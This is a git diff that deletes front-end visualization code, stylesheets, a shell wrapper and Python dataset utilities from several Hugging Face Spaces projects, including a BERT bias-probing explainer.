'#b68859', '#b78757', '#b88756', '#b98755', '#ba8653', '#bb8652', '#bc8550', '#bd854f', '#be854d', '#bf844c', '#bf844b', '#c0834a', '#c08348', '#c18247', '#c18246', '#c28145', '#c28044', '#c28043', '#c27f42', '#c27e41', '#c37e40', '#c27d3f', '#c27c3f', '#c27b3e', '#c27a3d', '#c27a3d', '#c1793c', '#c1783c', '#c1773c', '#c0763b', '#c0753b', '#bf743a', '#bf733a', '#be713a', '#bd703a', '#bd6f39', '#bc6e39', '#bb6d39', '#bb6b38', '#ba6a38', '#b96938', '#b86737', '#b76637', '#b76537', '#b66336', '#b56236', '#b46035', '#b35e35', '#b25d34', '#b15b34', '#b05933', '#af5833', '#ae5632', '#ad5431', '#ad5230', '#ac502f', '#ab4e2f', '#aa4c2e', '#a94a2c', '#a8482b', '#a7462a', '#a64429', '#a54127', '#a43f26', '#a33d24', '#a33a23', '#a23721', '#a1351f', '#a0321e', '#9f2f1c', '#9e2c1a', '#9d2818', '#9c2516', '#9c2114', '#9b1d11', '#9a180f', '#99120d', '#980b0a', '#970207', '#960004', '#950001', '#940000', '#930000', '#920000', '#910000', '#900000', '#8f0000', '#8e0000', '#8e0000', '#8d0000', '#8c0000', '#8b0000', '#8a0000', '#890000', '#880000', '#870000', '#860000', '#850000', '#840000', '#830000', '#820000', '#810000', '#800000'] - - return v => { - var i = d3.clamp(0, (v - min)/(max - min), 1) - return colors[Math.round(i*(colors.length - 1))] - } - - // https://gka.github.io/palettes/#/99|d|00429d,96ffea,d1ea00|d1ea00,ff005e,93003a|1|1 - // https://gka.github.io/palettes/#/99|d|00429d,96ffea,f1f1d2|f1f1d2,ff005e,93003a|1|1 - //https://gka.github.io/palettes/#/99|d|00429d,76dfca,d1d1b3|d1d1b3,a787a8,93003a|1|1 - // https://gka.github.io/palettes/#/99|d|76dfca,00429d,000000|000000,93003a,ff005e|1|1 - - // https://gka.github.io/palettes/#/99|d|078977,91a5ff,555555|555555,e2bfe3,980000|0|1 - // https://gka.github.io/palettes/#/99|d|002854,a1ffe1,555555|555555,ffa361,980000|0|1 - // https://gka.github.io/palettes/#/99|d|002854,a1ffe1,616161|616161,f47e2a,9e005c|0|1 - // var nMid = 13 - // var midIndex = Math.floor(colors.length/2) - // var minIndex = midIndex - (nMid - 1)/2 - // var maxIndex = midIndex + (nMid - 1)/2 - // var interpolate = d3.interpolate(colors[minIndex], colors[maxIndex]) - - // d3.range(minIndex, maxIndex + 1).forEach(i => { - // colors[i] = interpolate((i - minIndex)/nMid) - // }) - - // return d => { - // var rv = d3.interpolateGreys(d/2 + 2/2) - // if (rv == 'rgb(255, 255, 255)') rv = 'rgb(254, 254, 254)' - // return rv - // } - -} -window.util = { - palette, - color: d3.interpolateSpectral, - color: palette(0, 1), -} -window.util.colors = [1 - .25, .25].map(util.color) -window.util.colors.push('#aaaa00') - -!(function(){ - var memo = {} - - util.color2array = d => { - if (memo[d]) return memo[d] - - var {r, g, b} = d3.color(d).rgb() - return memo[d] = [r, g, b].map(v => v/255) - } -})() - - -// add colors to inline elements -!(function(){ - d3.selectAll('c0').st({fontWeight: 600, color: util.colors[0]}) - d3.selectAll('c1').st({fontWeight: 600, color: util.colors[1]}) - d3.selectAll('c2').st({fontWeight: 600, color: util.colors[2]}) -})() - - - -window.pairs = [ - { - class: 'texas-ohio', - s0: 'In New York, they like to buy _.', - s1: 'In Texas, they like to buy _.', - count: 30, - annotations: [ - { - str: 'BERT associates these potential purchases more with Texas
    than New York...', - pos: [15, 15], - color: util.colors[1] - }, - { - str: '...and these purchases
    more with New York
    than Texas', - pos: [290, 305], - color: util.colors[0] - }, - ], - ariaLabel: 'Scatter plot of differences in purchases between New York and Texas. Oil, cotten and land are associated more with Texas; Pictures and perfume are more associated with New York', - alts: [ - { - str: 'Ireland v. Australia', - s1: 'We went to Ireland and bought a _.', - s0: 'We went to Australia and bought a _.', - }, - { - str: 'Arctic v. Equator', - s1: 'Near the Arctic, they like to buy _.', - s0: 'Near the equator, they like to buy _.', - }, - { - str: 'Coast v. Plains', - s1: 'On the coast, they like to buy _.', - s0: 'On the plains, they like to buy _.', - }, - { - str: 'Narnia v. Gotham', - s1: 'In Narnia, they bought a _.', - s0: 'In Gotham, they bought a _.', - }, - { - str: 'Supermarket v. Mall', - s1: 'At the supermarket, they like to buy _.', - s0: 'At the mall, they like to buy _.', - }, - // { - // str: 'Train v. Plane', - // s1: 'At the airport, they like to buy _.', - // s0: 'At the bus depot, they like to buy _.', - // }, - // { - // str: 'buy v. sell', - // s0: 'They like to buy _.', - // s1: 'We like to buy _.', - // }, - // { - // str: 'Paris v. London', - // s1: 'In Paris, they like to buy _.', - // s0: 'In London, they like to buy _.', - // }, - ] - // type: 'Differences', - }, - { - class: 'age-name', - s0: 'Elsie was born in the year of _.', - s1: 'Lauren was born in the year of _.', - count: 200, - ariaLabel: 'Scatter plot of differences in birth years between Elsie and Lauren.', - }, - { - class: 'jim-jane', - s0: 'Jim worked as a _.', - s1: 'Jane worked as a _.', - count: 30, - ariaLabel: 'Scatter plot of differences in occupations between Jim and Jane. Salesmen, carpenter and mechanic are more associated with Jim; Nurse, secretary and modal are more associated with Jane.', - }, - { - class: 'nurse-name', - s0: 'The new nurse was named _.', - s1: 'The new doctor was named _.', - count: 30, - ariaLabel: 'Scatter plot of differences in doctor and nurse names. David, Michael and himself are more associated with doctors; Jean, Sarah and Catherine are more associated with nurses.', - - }, - { - class: 'nurse-name-zari-cda', - s0: 'The new nurse was named _.', - s1: 'The new doctor was named _.', - s0: 'The doctor performed CPR even though _ knew it was too late.', - s1: 'The nurse performed CPR even though _ knew it was too late.', - s0model: '_zari_cda', - s1model: '_zari_cda', - showModel: true, - count: 30, - ariaLabel: 'Scatter plot of differences in doctor and nurse names in the Zari model. He and she are equally associated with both. But Jack, Logan and Andrew are more associated with doctors; Emily, Rachel and Amy are more associated with nurses.', - }, - { - class: 'interesting-pair', - s1: '_ flavored ice cream is tasty.', - s0: '_ flavored ice cream is revolting.', - count: 30, - alts: [ - { - str: 'Dangerous animals', - s1: '_ is a [friendly|dangerous] animal', - s0: '_ is a [friendly|dangerous] animal', - }, - ] - } -] - -pairs.forEach(d => { - d.count = d.count || 200 - d.s0model = d.s0model || '' - d.s1model = d.s1model || '' - d.annotations = d.annotations || [] - d.model = d.s0model ? 'Zari' : 'BERT' - d.type = d.type || 'Likelihoods' - d.pairStr = JSON.stringify(d) -}) -// pairs = [window.pairs[1]] - - -var diffs = [ - { - s0: 'In [Texas|Paris], [Men|Women] like to buy _.', - s0: 'Born in [1940|2018], [his|her] name was _.', - s0: 'In [1908|2018], [he|she] was employed as a _.', - class: 'difference-difference', - count: 1000, - annotations: [], - model: 'BERT', - type: 'Likelihoods', - ariaLabel: 'Small multiple difference in difference plots.', - } -] - -diffs.forEach(d => { - d.pairStr = JSON.stringify(d) -}) - - -window.sents = [ - { - class: 'hamlet', - str: 'To be or not to be, that is the question;', - }, -] -sents.push({class: 'texas', str: pairs[0].s1.replace('_', 'things')}) -sents.push({class: 'new-york', str: pairs[0].s0.replace('_', 'things')}) - - -window.init = async function(){ - try { window.regltick.cancel() } catch (e) {} - - if (!window.tokenizer){ - window.tokenizer = new BertTokenizer() - await tokenizer.load() - } - - if (!window.bertLargeVocab){ - var text = await (await fetch('data/bert_large_vocab.txt')).text() - window.bertLargeVocab = text - .split('\n') - } - - sents.forEach(initSent) - sleep(10) - - pairs.forEach(initPair) - sleep(500) - window.initGenderOverTime() - - - // Skip rendering differene in difference until scrolled into view - var renderDiffDiff = false - var observer = new IntersectionObserver(entries => { - entries.forEach(d => { - if (renderDiffDiff || !d.isIntersecting) return - - initDiff(diffs[0]) - renderDiffDiff = true - }) - }, {}) - observer.observe(d3.select('.difference-difference').node()) - if (renderDiffDiff) initDiff(diffs[0]) - - - function sleep(ms) { - return new Promise(resolve => setTimeout(resolve, ms)) - } -} - -// Run init, rerun when width changes -!(function(){ - var lastInnerWidth = null - - function resize(){ - if (lastInnerWidth == window.innerWidth) return - lastInnerWidth = window.innerWidth - - window.init() - } - resize() - d3.select(window).on('resize', _.debounce(resize, 500)) -})() - -// Hamlet text entry -!(function(){ - var sel = d3.select('.hamlet-edit').html('') - .st({textAlign: 'center', marginTop: 17}) - .on('keydown', function(){ - sel.classed('changed', 1) - if (d3.event.keyCode != 13) return - d3.event.preventDefault() - - update() - }) - - var sent = sents[0] - - var inputSel = sel.append('textarea').at({cols: 30}) - inputSel.node().value = sent.str - - // sel.append('div') - sel.append('button.button.update').on('click', update).text('Update Sentence') - .st({width: 140, height: 47, marginLeft: 20, marginTop: 0, top: -19, marginRight: 0}) - - - function update(){ - sent.str = inputSel.node().value - - sel.classed('changed', 0) - initSent(sent) - } -})() - - -window.addLockedTooltip = function(sel){ - sel - .on('mouseover', function(d, i){ - ttSel - .html(d) - .select('.footend').remove() - - var x = this.offsetLeft, - y = this.offsetTop, - bb = ttSel.node().getBoundingClientRect(), - left = d3.clamp(20, (x-bb.width/2), window.innerWidth - bb.width - 20), - top = innerHeight + scrollY > y + 20 + bb.height ? y + 20 : y - bb.height - 10; - - ttSel.st({left, top}).classed('tooltip-hidden', false) - }) - - sel.on('mousemove',mouseover).on('mouseout', mouseout) - ttSel.on('mousemove', mouseover).on('mouseout', mouseout) - function mouseover(){ - if (window.__ttfade) window.__ttfade.stop() - } - function mouseout(){ - if (window.__ttfade) window.__ttfade.stop() - window.__ttfade = d3.timeout(() => { - ttSel.classed('tooltip-hidden', true) - }, 250) - } -} - -// Footnotes -!(function(){ - var footnums = '¹²³⁴⁵⁶⁷⁸⁹' - - var footendSel = d3.selectAll('.footend') - .each(function(d, i){ - var sel = d3.select(this) - var ogHTML = sel.parent().html() - sel - .at({href: '#footstart-' + i, id: 'footend-' + i}) - .text(footnums[i]) - .datum(ogHTML) - }) - - - var footstartSel = d3.selectAll('.footstart') - .each(function(d, i){ - d3.select(this) - .at({ - href: '#footend-' + i, - }) - .text(footnums[i]) - .datum(footendSel.data()[i]) - .parent().at({id: 'footstart-' + i}) - }) - .call(addLockedTooltip) - -})() - - - - - - - -// // Populate interesting alts -// !(() => { -// var listSel = d3.select('.interesting-list').st({display: 'none'}) - -// var listStr = listSel.text() - -// _.last(pairs).alts = listStr.split('-').map(d => d.trim()).filter(d => d).map(rawStr => { -// var start = rawStr.split('[')[0] -// var end = rawStr.split(']')[1] - -// var [t0, t1] = rawStr.split('[')[1].split(']')[0].split('|') -// var s0 = start + t0 + end -// var s1 = start + t1 + end - -// var str = `
    ${start} -// ${t1}|${t0} -// ${end}
    `.replace('_', '____') - -// return {str, s0, s1} -// }) -// })() - -// // Populate difference in difference -// !(() => { -// var listSel = d3.select('.difference-difference-list').st({display: 'none'}) - -// var listStr = listSel.text() - -// diffs[0].alts = listStr.split('-').map(d => d.trim()).filter(d => d).map(rawStr => { -// var start = rawStr.split('[')[0] -// var end = rawStr.split(']')[1] - -// var [t0, t1] = rawStr.split('[')[1].split(']')[0].split('|') -// var s0 = start + t0 + end -// var s1 = start + t1 + end - -// var str = `
    ${rawStr}
    `.replace('_', '____') - - -// return {str, s0, s1, rawStr} -// }) -// })() diff --git a/spaces/merve/dataset-worldviews/public/measuring-fairness/style.css b/spaces/merve/dataset-worldviews/public/measuring-fairness/style.css deleted file mode 100644 index 27a4ab72371dd17fe64ae938268ef37f7fb16247..0000000000000000000000000000000000000000 --- a/spaces/merve/dataset-worldviews/public/measuring-fairness/style.css +++ /dev/null @@ -1,274 +0,0 @@ -/* Copyright 2020 Google LLC. All Rights Reserved. - -Licensed under the Apache License, Version 2.0 (the "License"); -you may not use this file except in compliance with the License. -You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software -distributed under the License is distributed on an "AS IS" BASIS, -WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -See the License for the specific language governing permissions and -limitations under the License. -==============================================================================*/ - - -@media (max-width: 925px) { - #graph > div{ - position: relative; - top: 25px; - } -} - - - -body{ - --colors-well: rgb(179, 201, 204); - --colors-sick: rgb(241, 85, 85); - --lcolors-well: rgb(217, 228, 230); - --lcolors-sick: rgb(246, 145, 145); - --dcolors-well: rgb(63, 70, 71); - --dcolors-sick: rgb(84, 30, 30); -} - - -.tooltip { - top: -1000px; - position: fixed; - padding: 10px; - background: rgba(255, 255, 255, .90); - border: 1px solid lightgray; - pointer-events: none; -} -.tooltip-hidden{ - opacity: 0; - transition: all .3s; - transition-delay: .1s; -} - -@media (max-width: 590px){ - div.tooltip{ - bottom: -1px; - width: calc(100%); - left: -1px !important; - right: -1px !important; - top: auto !important; - width: auto !important; - } -} - -svg{ - overflow: visible; -} - -.domain{ - display: none; -} - -text{ - /*pointer-events: none;*/ - /*text-shadow: 0 1px 0 #fff, 1px 0 0 #fff, 0 -1px 0 #fff, -1px 0 0 #fff;*/ -} - - - -#graph > div{ - margin-top: 20px; -} - - -#end{ - height: 600px; -} - - -.mono{ - font-family: monospace; -} - - - - -.mini .axis{ - font-size: 10px; - line-height: 12px !important; - position: relative; - top: 40px; -} - -.axis{ - font-size: 12px; -} -.axis{ - color: #999; -} -.axis text{ - fill: #999; -} -.axis line{ - stroke: #ccc; -} - -div.axis b{ - margin-bottom: -10px; - display: block; -} - -.init-hidden{ - opacity: 0; -} - - -.highlight{ - color: #fff; - padding-left: 3px; - padding-right: 3px; - padding-top: 1px; - padding-bottom: 1px; - border-radius: 3px; -} - -.highlight.grey{ background: var(--colors-well); } -.highlight.box{ - border: 1px solid #000; - border-radius: 0px; - color: #000; - padding-bottom: 2px; -} - -.weepeople { - font-family: "WeePeople"; -} - - -wee{ - font-family: "WeePeople"; - font-size: 30px; - height: 22px; - display: inline; - position: relative; - top: 5px; - color: var(--colors-well); - padding: 1px; - margin: -1px; - line-height: 3px; -} -wee.sick{ - color: var(--colors-sick); -} - -wee.bg-sick{ - background: var(--lcolors-sick); -} -wee.bg-well{ - background: var(--lcolors-well); -} - -bg{ - background: var(--lcolors-well); - padding-left: 2px; - padding-right: 2px; -} - -bg.sick{ - background: var(--lcolors-sick); -} - -wee.sick.bg-well{ - -webkit-text-stroke: .6px var(--dcolors-sick); -} -wee.well.bg-sick{ - -webkit-text-stroke: .6px var(--dcolors-well); -} - - - -.equation{ - margin: 7px; - position: relative; -} - - -.gated #hidden{ - visibility: hidden; -} - -.gated.opened #hidden{ - visibility: unset; -} -.gated.opened #default{ - display: none; -} - -.gated #default{ - height: 0px; -} - - - - - - - -text.weepeople{ - stroke: #000; - stroke-width: 0; - /*stroke-width: .2;*/ -} - - - - -.post-summary, .headline{ - display: none; -} - - -i{ - pointer-events: none; -} - -.slider{ - position: relative; - z-index: 100; -} - - - - - -.cursor{ - animation-duration: 1s; - animation-name: bgblink; - display: inline-block; - animation-iteration-count: infinite; - animation-direction: alternate; - cursor: pointer; - transition: opacity .5s; - stroke: #000; -} - -@keyframes bgblink { - from { - /*fill: black;*/ - stroke-width: 0px; - } - - to { - /*fill: green;*/ - stroke-width: 16px; - } -} - -.no-blink .cursor{ - /*background: rgba(255,255,0,0) !important;*/ - animation: 0; -} - - - -#adjust-text{ - padding-top: 15px; - display: block; -} diff --git a/spaces/merve/hidden-bias/source/private-and-fair/accuracy-v-privacy-dataset_size.js b/spaces/merve/hidden-bias/source/private-and-fair/accuracy-v-privacy-dataset_size.js deleted file mode 100644 index cd196da1ca712ff733e5e03de4258effba0478a3..0000000000000000000000000000000000000000 --- a/spaces/merve/hidden-bias/source/private-and-fair/accuracy-v-privacy-dataset_size.js +++ /dev/null @@ -1,157 +0,0 @@ -!(async function(){ - var data = await util.getFile('cns-cache/model_grid_test_accuracy.json') - - data = data - .filter(d => util.epsilonExtent[1] <= d.epsilon && d.epsilon <= util.epsilonExtent[0]) - .filter(d => d.dataset_size > 1000) - - // .filter(d => d.dataset_size > 4000) - - // console.log(data) - - var bySize = d3.nestBy(data, d => d.dataset_size) - bySize.forEach((d, i) => { - d.dataset_size = d.key - - d.color = d3.interpolatePlasma(.84- i/6) - if (d.key == 60000){ - d3.selectAll('.tp60').st({background: d.color, padding: 2}) - } - if (d.key == 7500){ - d3.selectAll('.tp75').st({background: d.color, color: '#fff', padding: 2}) - } - - d.label = { - 60000: {pos: [7, 11], textAnchor: 'middle', text: '60,000'}, - 30000: {pos: [7, 11], textAnchor: 'middle', text: '30,000'}, - 15000: {pos: [7, -5], textAnchor: 'start', text: '15,000'}, - 7500: {pos: [0, 8], textAnchor: 'start', text: '7,500'}, - // 3750: {pos: [0, 14], textAnchor: 'end', text: '3,750 training points'}, - 3750: {pos: [-34, 10], textAnchor: 'start', text: '3,750'}, - 2000: {pos: [-50, 10], textAnchor: 'end', text: '2,000 training points'}, - }[d.key] - - d.forEach(e => e.size = d) - }) - - var sel = d3.select('.accuracy-v-privacy-dataset_size').html('') - .at({role: 'graphics-document', 'aria-label': `High privacy and accuracy requires more training data. Line chart showing too much differential privacy without enough data decreases accuracy.`}) - - sel.append('div.chart-title').text('High privacy and accuracy requires more training data') - - var c = d3.conventions({ - sel, - height: 400, - margin: {bottom: 125, top: 5}, - layers: 'sd', - }) - - c.x = d3.scaleLog().domain(util.epsilonExtent).range(c.x.range()) - c.xAxis = d3.axisBottom(c.x).tickFormat(d => { - var rv = d + '' - if (rv.split('').filter(d => d !=0 && d != '.')[0] == 1) return rv - }) - - c.yAxis.tickFormat(d => d3.format('.0%')(d))//.ticks(8) - - d3.drawAxis(c) - util.addAxisLabel(c, 'Higher Privacy →', 'Test Accuracy') - util.ggPlotBg(c, false) - c.layers[1].append('div') - .st({fontSize: 12, color: '#555', width: 120*2, textAlign: 'center', lineHeight: '1.3em'}) - .translate([c.width/2 - 120, c.height + 70]) - .html('in ε, a measure of how much modifying a single training point can change the model (models with a lower ε are more private)') - - - c.svg.selectAll('.y .tick').filter(d => d == .9) - .select('text').st({fontWeight: 600}).parent() - .append('path') - .at({stroke: '#000', strokeDasharray: '2 2', d: 'M 0 0 H ' + c.width}) - - var line = d3.line() - .x(d => c.x(d.epsilon)) - .y(d => c.y(d.accuracy)) - .curve(d3.curveMonotoneX) - - - var lineSel = c.svg.append('g').appendMany('path.accuracy-line', bySize) - .at({ - d: line, - fill: 'none', - }) - .st({ stroke: d => d.color, }) - .on('mousemove', setActiveDigit) - - var circleSel = c.svg.append('g') - .appendMany('g.accuracy-circle', data) - .translate(d => [c.x(d.epsilon), c.y(d.accuracy)]) - .on('mousemove', setActiveDigit) - // .call(d3.attachTooltip) - - circleSel.append('circle') - .at({r: 4, stroke: '#fff'}) - .st({fill: d => d.size.color }) - - - var labelSel = c.svg.appendMany('g.accuracy-label', bySize) - .translate(d => [c.x(d[0].epsilon), c.y(d[0].accuracy)]) - labelSel.append('text') - .filter(d => d.label) - .translate(d => d.label.pos) - .st({fill: d => d.color, fontWeight: 400}) - .at({textAnchor: d => d.label.textAnchor, fontSize: 14, fill: '#000', dy: '.66em'}) - .text(d => d.label.text) - .filter(d => d.key == 2000) - .text('') - .tspans(d => d.label.text.split(' ')) - - - c.svg.append('text.annotation') - .translate([225, 106]) - .tspans(d3.wordwrap('With limited data, adding more differential privacy improves accuracy...', 25), 12) - - c.svg.append('text.annotation') - .translate([490, 230]) - .tspans(d3.wordwrap(`...until it doesn't`, 20)) - - // setActiveDigit({dataset_size: 60000}) - function setActiveDigit({dataset_size}){ - lineSel - .classed('active', 0) - .filter(d => d.dataset_size == dataset_size) - .classed('active', 1) - .raise() - - circleSel - .classed('active', 0) - .filter(d => d.dataset_size == dataset_size) - .classed('active', 1) - .raise() - - labelSel - .classed('active', 0) - .filter(d => d.dataset_size == dataset_size) - .classed('active', 1) - } -})() - - - - -// aVal: 0.5 -// accuracy: 0.8936 -// accuracy_0: 0.9663265306122449 -// accuracy_1: 0.9806167400881057 -// accuracy_2: 0.9011627906976745 -// accuracy_3: 0.8633663366336634 -// accuracy_4: 0.8859470468431772 -// accuracy_5: 0.8733183856502242 -// accuracy_6: 0.9384133611691023 -// accuracy_7: 0.8657587548638133 -// accuracy_8: 0.8059548254620124 -// accuracy_9: 0.8434093161546086 -// dataset_size: 60000 -// epochs: 4 -// epsilon: 0.19034890168775565 -// l2_norm_clip: 0.75 -// noise_multiplier: 2.6 diff --git a/spaces/mikeee/radiobee-aligner/docs/build/html/_static/pygments.css b/spaces/mikeee/radiobee-aligner/docs/build/html/_static/pygments.css deleted file mode 100644 index be9feffb72350c3f6a6cea451ce4bd72951dff3b..0000000000000000000000000000000000000000 --- a/spaces/mikeee/radiobee-aligner/docs/build/html/_static/pygments.css +++ /dev/null @@ -1,74 +0,0 @@ -pre { line-height: 125%; margin: 0; } -td.linenos pre { color: #000000; background-color: #f0f0f0; padding: 0 5px 0 5px; } -span.linenos { color: #000000; background-color: #f0f0f0; padding: 0 5px 0 5px; } -td.linenos pre.special { color: #000000; background-color: #ffffc0; padding: 0 5px 0 5px; } -span.linenos.special { color: #000000; background-color: #ffffc0; padding: 0 5px 0 5px; } -.highlight .hll { background-color: #ffffcc } -.highlight { background: #f8f8f8; } -.highlight .c { color: #408080; font-style: italic } /* Comment */ -.highlight .err { border: 1px solid #FF0000 } /* Error */ -.highlight .k { color: #008000; font-weight: bold } /* Keyword */ -.highlight .o { color: #666666 } /* Operator */ -.highlight .ch { color: #408080; font-style: italic } /* Comment.Hashbang */ -.highlight .cm { color: #408080; font-style: italic } /* Comment.Multiline */ -.highlight .cp { color: #BC7A00 } /* Comment.Preproc */ -.highlight .cpf { color: #408080; font-style: italic } /* Comment.PreprocFile */ -.highlight .c1 { color: #408080; font-style: italic } /* Comment.Single */ -.highlight .cs { color: #408080; font-style: italic } /* Comment.Special */ -.highlight .gd { color: #A00000 } /* Generic.Deleted */ -.highlight .ge { font-style: italic } /* Generic.Emph */ -.highlight .gr { color: #FF0000 } /* Generic.Error */ -.highlight .gh { color: #000080; font-weight: bold } /* Generic.Heading */ -.highlight .gi { color: #00A000 } /* Generic.Inserted */ -.highlight .go { color: #888888 } /* Generic.Output */ -.highlight .gp { color: #000080; font-weight: bold } /* Generic.Prompt */ -.highlight .gs { font-weight: bold } /* Generic.Strong */ -.highlight .gu { color: #800080; font-weight: bold } /* Generic.Subheading */ -.highlight .gt { color: #0044DD } /* Generic.Traceback */ -.highlight .kc { color: #008000; font-weight: bold } /* Keyword.Constant */ -.highlight .kd { color: #008000; font-weight: bold } /* Keyword.Declaration */ -.highlight .kn { color: #008000; font-weight: bold } /* Keyword.Namespace */ -.highlight .kp { color: #008000 } /* Keyword.Pseudo */ -.highlight .kr { color: #008000; font-weight: bold } /* Keyword.Reserved */ -.highlight .kt { color: #B00040 } /* Keyword.Type */ -.highlight .m { color: #666666 } /* Literal.Number */ -.highlight .s { color: #BA2121 } /* Literal.String */ -.highlight .na { color: #7D9029 } /* Name.Attribute */ -.highlight .nb { color: #008000 } /* Name.Builtin */ -.highlight .nc { color: #0000FF; font-weight: bold } /* Name.Class */ -.highlight .no { color: #880000 } /* Name.Constant */ -.highlight .nd { color: #AA22FF } /* Name.Decorator */ -.highlight .ni { color: #999999; font-weight: bold } /* Name.Entity */ -.highlight .ne { color: #D2413A; font-weight: bold } /* Name.Exception */ -.highlight .nf { color: #0000FF } /* Name.Function */ -.highlight .nl { color: #A0A000 } /* Name.Label */ -.highlight .nn { color: #0000FF; font-weight: bold } /* Name.Namespace */ -.highlight .nt { color: #008000; font-weight: bold } /* Name.Tag */ -.highlight .nv { color: #19177C } /* Name.Variable */ -.highlight .ow { color: #AA22FF; font-weight: bold } /* Operator.Word */ -.highlight .w { color: #bbbbbb } /* Text.Whitespace */ -.highlight .mb { color: #666666 } /* Literal.Number.Bin */ -.highlight .mf { color: #666666 } /* Literal.Number.Float */ -.highlight .mh { color: #666666 } /* Literal.Number.Hex */ -.highlight .mi { color: #666666 } /* Literal.Number.Integer */ -.highlight .mo { color: #666666 } /* Literal.Number.Oct */ -.highlight .sa { color: #BA2121 } /* Literal.String.Affix */ -.highlight .sb { color: #BA2121 } /* Literal.String.Backtick */ -.highlight .sc { color: #BA2121 } /* Literal.String.Char */ -.highlight .dl { color: #BA2121 } /* Literal.String.Delimiter */ -.highlight .sd { color: #BA2121; font-style: italic } /* Literal.String.Doc */ -.highlight .s2 { color: #BA2121 } /* Literal.String.Double */ -.highlight .se { color: #BB6622; font-weight: bold } /* Literal.String.Escape */ -.highlight .sh { color: #BA2121 } /* Literal.String.Heredoc */ -.highlight .si { color: #BB6688; font-weight: bold } /* Literal.String.Interpol */ -.highlight .sx { color: #008000 } /* Literal.String.Other */ -.highlight .sr { color: #BB6688 } /* Literal.String.Regex */ -.highlight .s1 { color: #BA2121 } /* Literal.String.Single */ -.highlight .ss { color: #19177C } /* Literal.String.Symbol */ -.highlight .bp { color: #008000 } /* Name.Builtin.Pseudo */ -.highlight .fm { color: #0000FF } /* Name.Function.Magic */ -.highlight .vc { color: #19177C } /* Name.Variable.Class */ -.highlight .vg { color: #19177C } /* Name.Variable.Global */ -.highlight .vi { color: #19177C } /* Name.Variable.Instance */ -.highlight .vm { color: #19177C } /* Name.Variable.Magic */ -.highlight .il { color: #666666 } /* Literal.Number.Integer.Long */ \ No newline at end of file diff --git a/spaces/mms-meta/MMS/uroman/bin/uroman-tsv.sh b/spaces/mms-meta/MMS/uroman/bin/uroman-tsv.sh deleted file mode 100644 index adb81f4894a0539d44ad4370eda029694211e82b..0000000000000000000000000000000000000000 --- a/spaces/mms-meta/MMS/uroman/bin/uroman-tsv.sh +++ /dev/null @@ -1,28 +0,0 @@ -#!/usr/bin/env bash -# Created by Thamme Gowda on June 17, 2019 - -DIR=$(dirname "${BASH_SOURCE[0]}") # get the directory name -# DIR=$(realpath "${DIR}") # resolve its full path if need be - -if [[ $# -lt 1 || $# -gt 2 ]]; then - >&2 echo "ERROR: invalid args" - >&2 echo "Usage: []" - exit 2 -fi - -INP=$1 -OUT=$2 - -CMD=$DIR/uroman.pl - -function romanize(){ - paste <(cut -f1 $INP) <(cut -f2 $INP | $CMD) -} - -if [[ -n $OUT ]]; then - romanize > $OUT -else - romanize -fi - - diff --git a/spaces/montagekoko/anything-v3.0/app.py b/spaces/montagekoko/anything-v3.0/app.py deleted file mode 100644 index 99a6a3762d5e337f08e960c4a31b4ac2467bca49..0000000000000000000000000000000000000000 --- a/spaces/montagekoko/anything-v3.0/app.py +++ /dev/null @@ -1,8 +0,0 @@ -import gradio as gr - -description = """
    - -
    - """ - -gr.Interface.load("models/Linaqruf/anything-v3.0", description=description).launch() \ No newline at end of file diff --git a/spaces/mshkdm/VToonify/vtoonify/model/stylegan/op/__init__.py b/spaces/mshkdm/VToonify/vtoonify/model/stylegan/op/__init__.py deleted file mode 100644 index d0918d92285955855be89f00096b888ee5597ce3..0000000000000000000000000000000000000000 --- a/spaces/mshkdm/VToonify/vtoonify/model/stylegan/op/__init__.py +++ /dev/null @@ -1,2 +0,0 @@ -from .fused_act import FusedLeakyReLU, fused_leaky_relu -from .upfirdn2d import upfirdn2d diff --git a/spaces/mshukor/UnIVAL/data/ofa_dataset.py b/spaces/mshukor/UnIVAL/data/ofa_dataset.py deleted file mode 100644 index fa30b24c858bb36da1179a53aef717b54d6b22f3..0000000000000000000000000000000000000000 --- a/spaces/mshukor/UnIVAL/data/ofa_dataset.py +++ /dev/null @@ -1,79 +0,0 @@ -# Copyright 2022 The OFA-Sys Team. -# All rights reserved. -# This source code is licensed under the Apache 2.0 license -# found in the LICENSE file in the root directory. - -import logging -import re -import torch.utils.data -from fairseq.data import FairseqDataset - -logger = logging.getLogger(__name__) - - -class OFADataset(FairseqDataset): - def __init__(self, split, dataset, bpe, src_dict, tgt_dict): - self.split = split - self.dataset = dataset - self.bpe = bpe - self.src_dict = src_dict - self.tgt_dict = tgt_dict - - self.bos = src_dict.bos() - self.eos = src_dict.eos() - self.pad = src_dict.pad() - self.bos_item = torch.LongTensor([self.bos]) - self.eos_item = torch.LongTensor([self.eos]) - - def __len__(self): - return len(self.dataset) - - def encode_text(self, text, length=None, append_bos=False, append_eos=False, use_bpe=True): - s = self.tgt_dict.encode_line( - line=self.bpe.encode(text) if use_bpe else text, - add_if_not_exist=False, - append_eos=False - ).long() - if length is not None: - s = s[:length] - if append_bos: - s = torch.cat([self.bos_item, s]) - if append_eos: - s = torch.cat([s, self.eos_item]) - return s - - def pre_question(self, question, max_ques_words=None): - question = question.lower().lstrip(",.!?*#:;~").replace('-', ' ').replace('/', ' ') - - question = re.sub( - r"\s{2,}", - ' ', - question, - ) - question = question.rstrip('\n') - question = question.strip(' ') - - # truncate question - question_words = question.split(' ') - if max_ques_words is not None and len(question_words) > max_ques_words: - question = ' '.join(question_words[:max_ques_words]) - - return question - - def pre_caption(self, caption, max_words=None): - caption = caption.lower().lstrip(",.!?*#:;~").replace('-', ' ').replace('/', ' ').replace('', 'person') - - caption = re.sub( - r"\s{2,}", - ' ', - caption, - ) - caption = caption.rstrip('\n') - caption = caption.strip(' ') - - # truncate caption - caption_words = caption.split(' ') - if max_words is not None and len(caption_words) > max_words: - caption = ' '.join(caption_words[:max_words]) - - return caption diff --git a/spaces/mshukor/UnIVAL/fairseq/examples/speech_recognition/data/asr_dataset.py b/spaces/mshukor/UnIVAL/fairseq/examples/speech_recognition/data/asr_dataset.py deleted file mode 100644 index 63a6fcac85d73b1fce8e4d044b4209b1b67fa8ce..0000000000000000000000000000000000000000 --- a/spaces/mshukor/UnIVAL/fairseq/examples/speech_recognition/data/asr_dataset.py +++ /dev/null @@ -1,122 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import os - -import numpy as np -from fairseq.data import FairseqDataset - 